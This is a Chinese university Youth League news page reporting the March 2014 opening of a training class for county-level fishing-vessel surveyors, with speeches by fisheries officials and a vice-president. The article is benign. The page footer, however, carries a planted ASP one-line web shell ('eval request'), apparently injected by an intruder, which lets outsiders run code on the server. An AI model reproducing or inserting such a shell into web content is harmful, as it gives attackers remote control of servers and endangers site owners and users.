当前位置:共青团上海海洋大学委员会 >> 新闻中心 >> 要闻速递 >> 正文  
站内信息搜索:
全国第三期内陆骨干县(市)验船师基础专业长训班在我校开班
[2014年03月16日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    2014年3月10日下午,全国第三期内陆骨干县(市)验船师基础专业长训班开班典礼在图文信息中心406会议室顺利举行。农业部渔业船舶检验局副局长钟小金、产品处处长何新勇、副处长贾春勇副、调研员郑松传,体系建设处副处长郭音,上海渔业船舶检验局局长周全,江苏省渔业船舶检验局局长胡永生和副校长黄硕琳出席典礼,参加本次开班典礼还有来自内陆沿海18个省市自治区,4个民族的36名验船人员和上海海洋大学部分教师代表。本次开班典礼仪式由海洋科学学院院长陈新军主持。

 

    黄硕琳副校长在致辞中向36名学员以及出席领导表示热烈欢迎。他介绍了上海海洋大学的悠久历史、办学规模。上海海洋大学在第一期和第二期验船师培训班成功举办的基础上,在教学和管理上有了进一步完善,学员住宿条件有了的极大改善。他表示学校将尽最大的努力,进一步做好验船师培训工作。

    学员代表王建在发言中表示,特别珍惜本次培训机会,并表态将尽快转换角色,端正学习态度,遵守学校的各项规章制度,结合自己工作中的重点和难点,带着问题来学习,认真完成此次培训任务。

    上海局周全局长和江苏局胡永生局长表示积极支持上海海洋大学培训基地工作,完成部局交给的任务,并希望各省市能够积极展开讨论和交流,共同提高。

     国家渔业船舶检验局副局长钟小金讲话。他首先对参与本次培训的36名学员表示热烈欢迎,对承担本次培训工作的上海海洋大学、承担部分教学任务的上海和江苏船检局表示了衷心的感谢,对已经取得的培训成效表示了充分的肯定。再次强调了此次验船师培训“千人计划”的重要性和紧迫性。同时提出了三点要求,一是充分认识培训班的重要性,加强学习;二是精确组织,确保培训取得实效;三是联系实际学以致用。

     开班典礼后,农业部渔业船检局领导与研究生部、科技处领导及工程学院教授等进行了座谈,工程学院领导汇报了高级研修班及柴油机型谱秘书处设置等事宜,并进行了集体讨论交流。会后钟小金副局长一行到验船师培训班学员宿舍看望学员。

 

关闭窗口

上一篇:我校科普志愿者项目获浦东新区十佳青年公益项目称号

下一篇:校领导到经管学院调研学科建设工作
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>